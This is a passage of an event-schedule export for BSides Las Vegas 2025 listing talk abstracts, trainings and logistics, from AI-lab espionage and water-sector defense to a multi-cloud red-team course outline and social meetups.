            <description>As artificial intelligence becomes a pillar of economic and strategic power, AI labs are emerging as the next high-value targets for espionage and cyberattacks. State and corporate actors have compromised other critical sectors, such as semiconductors, aerospace, and biotechnology, for decades to steal trade secrets and shift global advantage. Leading voices are now starting to question the security of AI-related infrastructure. In this talk, we discuss findings from over 200 previous cyber and espionage incidents across various industries, shedding light on how and where the risks apply to the supply chain of AI models. We discuss the most feasible attack patterns toward sensitive assets such as model weights, training pipelines, and proprietary data. Then, we distill actionable lessons to mitigate the most pressing threats. We also demonstrate how AI-related IP theft differs from other sectors due to the extraordinary potential for economic and strategic power gains, which heighten the incentives of attackers and increase the risk to AI organizations.

To complement the insights from historic attacks and evaluate present-day infrastructure security, we draw on recent research analyzing the national cybersecurity strategies of cyber powers such as the US, Australia, Singapore, and the United Kingdom. These strategies offer diverse policy approaches for defending critical infrastructure, assigning cybersecurity responsibilities, and engaging industry in proactive security efforts. While there is no universal blueprint, several recurring practices, such as workforce development, public-private collaboration, and clear cyber governance, can inform how governments and AI developers protect AI systems. We highlight which of these lessons translate effectively to the unique challenges of AI infrastructure and conclude with recommendations for closing current policy gaps and preparing for future threats.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/R83DQJ/</url>
            <location>Siena</location>
            
            <attendee>Fred Heiding</attendee>
            
            <attendee>AndrewKao</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>MDFBYP@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-MDFBYP</pentabarf:event-slug>
            <pentabarf:title>Setting the Table - WarGames 2027 &amp; Maslow&#x27;s Hierarchy of Needs as Hybrid Warfare Nears</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T100000</dtstart>
            <dtend>20250804T113000</dtend>
            <duration>013000</duration>
            <summary>Setting the Table - WarGames 2027 &amp; Maslow&#x27;s Hierarchy of Needs as Hybrid Warfare Nears</summary>
            <description>The session will share the evidence, test assumptions, explore the art of the possible, and establish a sound hierarchy of needs enabling this talent pool to best serve the public good.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/MDFBYP/</url>
            <location>Copa</location>
            
            <attendee>Bryson Bort</attendee>
            
            <attendee>Josh Corman</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>TYPJMU@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-TYPJMU</pentabarf:event-slug>
            <pentabarf:title>Defending Our Water - Defending Our Lives</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T140000</dtstart>
            <dtend>20250804T160000</dtend>
            <duration>020000</duration>
            <summary>Defending Our Water - Defending Our Lives</summary>
            <description>This panel will discuss threats to the water systems and opportunities to reduce these threats. In addition, the panel will feature a discussion about Cyber-Informed Engineering, and how following certain engineering practices can materially reduce risks from a variety of sources. The panelists will also outline practical steps for mitigation, emphasizing the urgent need for cross-sector collaboration, robust contingency planning, and public awareness. The time to act is now—before luck runs out.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event2HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/TYPJMU/</url>
            <location>Copa</location>
            
            <attendee>Dean Ford</attendee>
            
            <attendee>Virginia “Ginger” Wright</attendee>
            
            <attendee>Andrew Ohrt</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>MSMDTM@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-MSMDTM</pentabarf:event-slug>
            <pentabarf:title>Cyber Incident Command System (CICS) A people orchestration layer</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T170000</dtstart>
            <dtend>20250804T174500</dtend>
            <duration>004500</duration>
            <summary>Cyber Incident Command System (CICS) A people orchestration layer</summary>
            <description>We will be utilizing humor on our slides to ensure an enjoyable experience to what can be a dry concept.
A firefighter from San Diego can travel across the country to New York to respond to a wildfire in a different jurisdiction and use the same language, organizational structures, and terminology. Why can’t information technology professionals make the same trip?
If cyber security professionals wish to strengthen operational capacity across the industry, we need to start by speaking the same language. This will be an introduction to the language and tools of local, state, tribal and territorial governments in response to a disaster event. We will encourage information sector professionals to respond to significant events with a standardized method for organizing people and equipment. The Incident Command System is tested and utilized during disasters regardless of size, scale, or type. Police, Fire, Coast Guard, Nuclear Power Plants, Hospitals, Governments, utility companies and more utilize this system to safely, flexibly, and effectively manage events of any scale. We present this system in a byte-sized way to encourage investigation and discussion of this topic without getting bogged down in the details. This talk is intended to start the education process and open the discussion for those looking for a deeper way to respond to incidents.
The problems facing IT are a lack of interoperability and staff safety. First, we define the problems of the current information technology sector&#x27;s response to events as the lack of interoperability and staff safety.
Regarding interoperability, most IT professionals must learn new incident response tactics upon joining a new organization. Additionally, turnover between staff during an incident is stressful for everyone involved.
Staff safety is not managed well by organizations, causing mental and behavioral stress that leads to burnout. The National Incident Management System identifies roles required to support team members, protecting staff and reducing stress.
We present the Incident Command System (ICS), a part of the National Incident Management System (NIMS), as a more resilient and safe option during crisis. This system improves interoperability of staff across various agencies and departments. We will describe overarching themes and concepts intended to spark interest.
The overarching themes and concepts include: division of work into the organizational structures of the Operations, Planning, Logistics, and Finance and Administration Sections; flexibility of the system to grow organically with incident complexity and scale; standardization of roles and responsibilities; and span of control, defining the best supervisor-to-worker ratios, tested and proven in dangerous situations.
We then propose a work group to develop the Cyber Incident Command System (CICS), a simplified version that is compatible with the National Incident Management System, enabling Information Technology teams to quickly adopt a command system for their unique situations.
We finish with a pointer to free online training in the subject for deeper investigation. 
We will use clear, plain language keeping the entire talk at a level where nonpractitioners can approach the topics and understand what is discussed.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/MSMDTM/</url>
            <location>Copa</location>
            
            <attendee>Blake Scott</attendee>
            
            <attendee>Scott Fraser</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>3P8AP9@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-3P8AP9</pentabarf:event-slug>
            <pentabarf:title>Cascading Failure, Unified Defense: Defending Water, Power, Healthcare, &amp; EMS</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T174500</dtstart>
            <dtend>20250804T183000</dtend>
            <duration>004500</duration>
            <summary>Cascading Failure, Unified Defense: Defending Water, Power, Healthcare, &amp; EMS</summary>
            <description>State-sponsored actors like Volt Typhoon are no longer a theoretical threat; they are actively pre-positioned within U.S. critical infrastructure. Their strategic focus on water, power, and telecommunications systems is designed to trigger devastating cascading failures across healthcare, EMS, and 911 dispatch in times of crisis.

This presentation moves beyond a purely technical discussion to confront this sobering reality head-on. It addresses the critical operational disconnect between traditional Incident Command (ICS) and modern cyber response—a gap that adversaries are poised to exploit. We will explore realistic attack scenarios, tracing the domino effect from a single breach to a full-scale public safety catastrophe.

Attendees will be equipped with a proven, integrated framework for defense. Key highlights include strategies to unify cyber and physical command structures and a roadmap of pragmatic, high-impact security controls that are achievable even for under-resourced agencies. This talk delivers an actionable approach to building genuine cyber-physical resilience against the sophisticated threats defining the new public safety frontline.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/3P8AP9/</url>
            <location>Copa</location>
            
            <attendee>Alexander Vanino</attendee>
            
            <attendee>Ruslan Karimov</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>9JFS7X@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-9JFS7X</pentabarf:event-slug>
            <pentabarf:title>Can You Hear Me Now? A Survey of Communications Platforms During Emergencies</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T183000</dtstart>
            <dtend>20250804T190000</dtend>
            <duration>003000</duration>
            <summary>Can You Hear Me Now? A Survey of Communications Platforms During Emergencies</summary>
            <description>In an increasingly interconnected world, the ability to communicate during emergencies—especially when traditional infrastructure fails—is critical. This presentation explores a range of communication options available to private citizens, focusing on both licensed and unlicensed technologies. Attendees will gain a practical understanding of tools such as Family Radio Service (FRS), General Mobile Radio Service (GMRS), Citizens Band (CB), and Amateur Radio (licensed), as well as unlicensed digital solutions like LoRa (Long Range) technology.

Special attention will be given to LoRa, a low-power, long-range wireless protocol that enables decentralized, peer-to-peer communication without reliance on cellular or internet infrastructure. The session will compare the capabilities, legal considerations, range, and use cases of each option, with an emphasis on emergency preparedness, community resilience, and ease of deployment.

By the end of the presentation, participants will be equipped with actionable knowledge to select affordable communication tools for their needs, ensuring they remain connected when it matters most.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/9JFS7X/</url>
            <location>Copa</location>
            
            <attendee>Slava I. Maslennikov</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>YC99LU@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-YC99LU</pentabarf:event-slug>
            <pentabarf:title>Queercon Mixer</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T220000</dtstart>
            <dtend>20250805T000000</dtend>
            <duration>020000</duration>
            <summary>Queercon Mixer</summary>
            <description>Queercon Mixer</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event2HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/YC99LU/</url>
            <location>Copa</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>JCQJGD@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-JCQJGD</pentabarf:event-slug>
            <pentabarf:title>Recovery Hackers, Monday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T193000</dtstart>
            <dtend>20250804T213000</dtend>
            <duration>020000</duration>
            <summary>Recovery Hackers, Monday</summary>
            <description>Not a formal 12-step meeting. Rather, a supportive gathering for folks taking Summer Camp one day at a time. Monday, Tuesday and Wednesday, 19:30-21:30 in G103. Look for the sign on a patio on the pool side of building G and enter through the patio door.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event2HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/JCQJGD/</url>
            <location>G-103</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>UXJNAP@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-UXJNAP</pentabarf:event-slug>
            <pentabarf:title>Info Booth Opens, Monday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T070000</dtstart>
            <dtend>20250804T070000</dtend>
            <duration>000000</duration>
            <summary>Info Booth Opens, Monday</summary>
            <description>Info Booth Opens, Monday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/UXJNAP/</url>
            <location>Hallway</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>PLXCVD@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-PLXCVD</pentabarf:event-slug>
            <pentabarf:title>Registration Opens, Monday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T073000</dtstart>
            <dtend>20250804T073000</dtend>
            <duration>000000</duration>
            <summary>Registration Opens, Monday</summary>
            <description>Registration Opens, Monday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/PLXCVD/</url>
            <location>Hallway</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>NYLF9K@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-NYLF9K</pentabarf:event-slug>
            <pentabarf:title>Skytalks Token Drop 1</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T090000</dtstart>
            <dtend>20250804T100000</dtend>
            <duration>010000</duration>
            <summary>Skytalks Token Drop 1</summary>
            <description>Skytalks Token Drop 1
Skytalks token distribution for Monday MORNING sessions (10:00-11:30)
Queue in Tuscany Hallway between Middle Ground and Speaker Room.
Tokens are limited in number, and distribution ends when they are gone.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/NYLF9K/</url>
            <location>Hallway</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>BU3CAX@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-BU3CAX</pentabarf:event-slug>
            <pentabarf:title>Skytalks Token Drop 2</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T123000</dtstart>
            <dtend></dtend>
            <duration>010000</duration>
            <summary>Skytalks Token Drop 2</summary>
            <description>Skytalks Token Drop 2
Skytalks token distribution for Monday AFTERNOON sessions (2:00-4:00 PM)
Queue in Tuscany Hallway between Middle Ground and Speaker Room.
Tokens are limited in number, and distribution ends when they are gone.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/BU3CAX/</url>
            <location>Hallway</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>MKBYQL@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-MKBYQL</pentabarf:event-slug>
            <pentabarf:title>Info Booth Closes, Monday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T190000</dtstart>
            <dtend>20250804T190000</dtend>
            <duration>000000</duration>
            <summary>Info Booth Closes, Monday</summary>
            <description>Info Booth Closes, Monday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/MKBYQL/</url>
            <location>Hallway</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>SBKTXT@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-SBKTXT</pentabarf:event-slug>
            <pentabarf:title>Registration Closes, Monday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T190000</dtstart>
            <dtend>20250804T190000</dtend>
            <duration>000000</duration>
            <summary>Registration Closes, Monday</summary>
            <description>Registration Closes, Monday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/SBKTXT/</url>
            <location>Hallway</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>D3ZJ83@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-D3ZJ83</pentabarf:event-slug>
            <pentabarf:title>Multi-Cloud (AWS, Azure &amp; GCP) Security [25 Edition], Day One, AM</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T103000</dtstart>
            <dtend>20250804T143000</dtend>
            <duration>040000</duration>
            <summary>Multi-Cloud (AWS, Azure &amp; GCP) Security [25 Edition], Day One, AM</summary>
            <description>To make the workshop hands-on in the real sense all the trainees will be provided with Lab Access to the Multi-Cloud Environment. Lab Architecture is designed to cover all the attacks from both aspects that are demonstrated during the sessions.

### DAY 1 (8 Hrs)
- Part-1 : Introduction about Multi Cloud Environment

  - Module-1 : Azure Cloud Environment
    - Azure Identity : Entra ID &amp; RBAC
    - O365 / Microsoft 365
    - Azure Cloud Services (VM, Storage, IaaS, PaaS, SaaS)

  - Module-2 : AWS Cloud Environment
    - Identity &amp; Access Management
    - AWS Cloud Services (IaaS, PaaS, SaaS)
    - AWS Identity Center

  - Module-3 : GCP Cloud Environment
    - GCP Identity &amp; Access Management
    - GCP Cloud Services (IaaS, PaaS, SaaS)
    - Google Suite / Workspace + Cloud Identity

- Part-2 : Enumeration &amp; Initial Access on Cloud Infrastructure

  - Module-1 : Unauthenticated Enumeration
    - Enumerating Information from DNS Records
    - Enumerating Information from Cloud Vendors
    - Leaked secrets from GitHub
    - Enumerating storage &amp; other information from OSINT

  - Module-2 : Initial Access
    - Exploiting Cloud Services
    - Leaked Credentials
    - Compromising CI/CD pipeline
    - Compromising storage accounts

  - Module-3 : Authenticated Enumeration : IAM, Compute &amp; Storage
    - AWS Services
    - Entra ID &amp; Azure Services
    - Cloud Identity, Google Workspace, GCP Services

### DAY 2 (8 Hrs)
- Part-3 : Exploiting Multi-Cloud Services

  - Module-1 : Exploiting Multi-Cloud Services
    - AWS : cross account, within account
    - Azure : service principal, cross tenant, Entra ID
    - GCP : Access organization, Cloud Identity

  - Module-2 : Privilege Escalation
    - Elevating Privileges on AWS
    - Elevating Privileges on Azure
    - Elevating Privileges on GCP

- Part-4 : Lateral Movement

  - Module-1 : Within Multi-Cloud
    - AWS, GCP, Azure to each other

- Part-5 : Case Study (Multi-Cloud Red Team Simulation)
  - Red Teaming in Simulated Multi-Cloud Lab (Initial Access to Data Exfiltration)

###### NOTE : Attendees do not require cloud accounts; they will get access to the seamless environment &amp; have access to the environment for 15 days with a dedicated Discord channel.

- Why should people attend your course?
  - Practically Understand Enterprise Grade Red Team Operation Methodology in Multi-Cloud Environment
  - Perform Red Team Attack Cycle in Simulated Enterprise Environment
  - Stealth Lateral Movement Techniques in Multi-Cloud, Cloud to on-premise &amp; vice-versa
  - Core Services Mapping / Enumeration / Exploitation
  - Create custom tools to perform manual enumeration

- Student Requirements :

  - Fair Knowledge of Networking and Web Technology
  - Familiarity with CLI
  - An Open mind (*No prior Cloud knowledge is required).

- Who Should Take This Course ?
  - Targeted Audience may include the following group of people:
  - Penetration Testers / Red Teams
  - Cloud Security Professionals
  - Cloud Architects
  - SOC analysts
  - Threat Hunting Team
  - Last but not least, anyone who is interested in strengthening their offensive and detection capabilities in Cloud

- How many years of practical experience would the ideal student have to get most out of this workshop?
  - Minimum 1-3 years in Penetration Testing Domain.

- What Students Should Bring?

  - System with at least 16GB RAM having VMware Workstation Pro installed
  - CWL RedCloud VM With Internet Connectivity

- What Students Will Be Provided With?

  - Soft Copy of the Course Content.
  - Great Knowledge about the Offensive Cloud Techniques used by adversaries.
  - Defense Tactics &amp; Techniques against the discussed offensive techniques.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Training-16h</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/D3ZJ83/</url>
            <location>Ballroom</location>
            
            <attendee>Yash Bharadwaj</attendee>
            
            <attendee>Manish Gupta</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>XH3PFM@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-XH3PFM</pentabarf:event-slug>
            <pentabarf:title>Multi-Cloud (AWS, Azure &amp; GCP) Security [25 Edition], Day One, PM</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T150000</dtstart>
            <dtend>20250804T190000</dtend>
            <duration>040000</duration>
            <summary>Multi-Cloud (AWS, Azure &amp; GCP) Security [25 Edition], Day One, PM</summary>
            <description>To make the workshop hands-on in the real sense all the trainees will be provided with Lab Access to the Multi-Cloud Environment. Lab Architecture is designed to cover all the attacks from both aspects that are demonstrated during the sessions.

### DAY 1 (8 Hrs)
- Part-1 : Introduction about Multi Cloud Environment

  - Module-1 : Azure Cloud Environment
    - Azure Identity : Entra ID &amp; RBAC
    - O365 / Microsoft 365
    - Azure Cloud Services (VM, Storage, IaaS, PaaS, SaaS)

  - Module-2 : AWS Cloud Environment
    - Identity &amp; Access Management
    - AWS Cloud Services (IaaS, PaaS, SaaS)
    - AWS Identity Center

  - Module-3 : GCP Cloud Environment
    - GCP Identity &amp; Access Management
    - GCP Cloud Services (IaaS, PaaS, SaaS)
    - Google Suite / Workspace + Cloud Identity

- Part-2 : Enumeration &amp; Initial Access on Cloud Infrastructure

  - Module-1 : Unauthenticated Enumeration
    - Enumerating Information from DNS Records
    - Enumerating Information from Cloud Vendors
    - Leaked secrets from GitHub
    - Enumerating storage &amp; other information from OSINT

  - Module-2 : Initial Access
    - Exploiting Cloud Services
    - Leaked Credentials
    - Compromising CI/CD pipeline
    - Compromising storage accounts

  - Module-3 : Authenticated Enumeration : IAM, Compute &amp; Storage
    - AWS Services
    - Entra ID &amp; Azure Services
    - Cloud Identity, Google Workspace, GCP Services

### DAY 2 (8 Hrs)
- Part-3 : Exploiting Multi-Cloud Services

  - Module-1 : Exploiting Multi-Cloud Services
    - AWS : cross account, within account
    - Azure : service principal, cross tenant, Entra ID
    - GCP : Access organization, Cloud Identity

  - Module-2 : Privilege Escalation
    - Elevating Privileges on AWS
    - Elevating Privileges on Azure
    - Elevating Privileges on GCP

- Part-4 : Lateral Movement

  - Module-1 : Within Multi-Cloud
    - AWS, GCP, Azure to each other

- Part-5 : Case Study (Multi-Cloud Red Team Simulation)
  - Red Teaming in Simulated Multi-Cloud Lab (Initial Access to Data Exfiltration)

###### NOTE : Attendees do not require cloud accounts; they will get access to the seamless environment &amp; have access to the environment for 15 days with a dedicated Discord channel.

- Why should people attend your course?
  - Practically Understand Enterprise Grade Red Team Operation Methodology in Multi-Cloud Environment
  - Perform Red Team Attack Cycle in Simulated Enterprise Environment
  - Stealth Lateral Movement Techniques in Multi-Cloud, Cloud to on-premise &amp; vice-versa
  - Core Services Mapping / Enumeration / Exploitation
  - Create custom tools to perform manual enumeration

- Student Requirements :

  - Fair Knowledge of Networking and Web Technology
  - Familiarity with CLI
  - An Open mind (*No prior Cloud knowledge is required).

- Who Should Take This Course ?
  - Targeted Audience may include the following group of people:
  - Penetration Testers / Red Teams
  - Cloud Security Professionals
  - Cloud Architects
  - SOC analysts
  - Threat Hunting Team
  - Last but not least, anyone who is interested in strengthening their offensive and detection capabilities in Cloud

- How many years of practical experience would the ideal student have to get most out of this workshop?
  - Minimum 1-3 years in Penetration Testing Domain.

- What Students Should Bring?

  - System with at least 16GB RAM having VMware Workstation Pro installed
  - CWL RedCloud VM With Internet Connectivity

- What Students Will Be Provided With?

  - Soft Copy of the Course Content.
  - Great Knowledge about the Offensive Cloud Techniques used by adversaries.
  - Defense Tactics &amp; Techniques against the discussed offensive techniques.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Training-16h</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/XH3PFM/</url>
            <location>Ballroom</location>
            
            <attendee>Yash Bharadwaj</attendee>
            
            <attendee>Manish Gupta</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>VZH78P@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-VZH78P</pentabarf:event-slug>
            <pentabarf:title>Introduction to Cryptographic Attacks</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T103000</dtstart>
            <dtend>20250804T143000</dtend>
            <duration>040000</duration>
            <summary>Introduction to Cryptographic Attacks</summary>
            <description>This workshop will discuss the theory and practice of cryptographic attacks. We start with symmetric key cryptographic attacks starting with stream ciphers and how reuse of keystream can lead to exposing the plaintext. From there we move on to other symmetric key attacks.

After the symmetric key attacks, we move on to the public key attacks that will primarily focus on private key recovery. Attacks on the keys will also include exporting to standard private key files. Many of these attacks can even be relevant to TLS and SSH as we will discuss.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Training-4h</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/VZH78P/</url>
            <location>Pearl</location>
            
            <attendee>Matt Cheung</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>RNF79D@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-RNF79D</pentabarf:event-slug>
            <pentabarf:title>Workshop on Cybersecurity Policy in Practice</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T150000</dtstart>
            <dtend></dtend>
            <duration>040000</duration>
            <summary>Workshop on Cybersecurity Policy in Practice</summary>
            <description>The workshop is divided into four sessions – lecture, fishbowl activity, deep dive, and stakeholder breakout. The lecture and deep dive sessions will be 45 minutes each, with 5 minutes for questions while the activity sessions are being set up.

[45 minutes] Session 1: Expert Lecture 
[5 minutes] Q&amp;A and Activity Setup 

[1 hour] Session 2: Fishbowl Activity 

[20 minutes] Break 

[45 minutes] Session 3: Deep Dive 
[5 minutes] Q&amp;A and Activity Setup

[1 hour] Session 4: Stakeholder Breakout Activity</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Training-4h</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/RNF79D/</url>
            <location>Pearl</location>
            
            <attendee>Jayati Dev</attendee>
            
            <attendee>Vaibhav Garg</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>E7XNDF@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-E7XNDF</pentabarf:event-slug>
            <pentabarf:title>From Command Line to Center Stage: Hack Your Way to Confident Speaking</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T103000</dtstart>
            <dtend>20250804T143000</dtend>
            <duration>040000</duration>
            <summary>From Command Line to Center Stage: Hack Your Way to Confident Speaking</summary>
            <description>Public speaking is a skill that can elevate your career, expand your influence, and help you deliver impactful messages with clarity and confidence. Whether you&#x27;re stepping onto the stage for the first time or looking to refine your delivery, this interactive workshop will equip you with the tools to present with poise and purpose.

Led by a seasoned speaker with 20 years of experience, over 400 presentations delivered in the past five years, and training from world-class Toastmasters, this workshop is created to help you conquer stage fright, structure your thoughts effectively, and engage your audience with confidence. Drawing from a deep background in cybersecurity and professional speaking, this hands-on experience will push you out of your comfort zone—in the best way possible.

By the end of the session, everyone will take the stage, delivering a short three-minute presentation while receiving constructive feedback in a supportive environment. You’ll walk away with practical techniques to control nerves, project authority, and own the room. If you’re ready to amplify your voice and master the art of public speaking, this workshop is for you!</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Training-4h</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/E7XNDF/</url>
            <location>Opal</location>
            
            <attendee>Erich Kron</attendee>
            
            <attendee>James McQuiggan</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>G33FLE@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-G33FLE</pentabarf:event-slug>
            <pentabarf:title>Engineering Cyber Resilience for the Water Sector</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T150000</dtstart>
            <dtend>20250804T190000</dtend>
            <duration>040000</duration>
            <summary>Engineering Cyber Resilience for the Water Sector</summary>
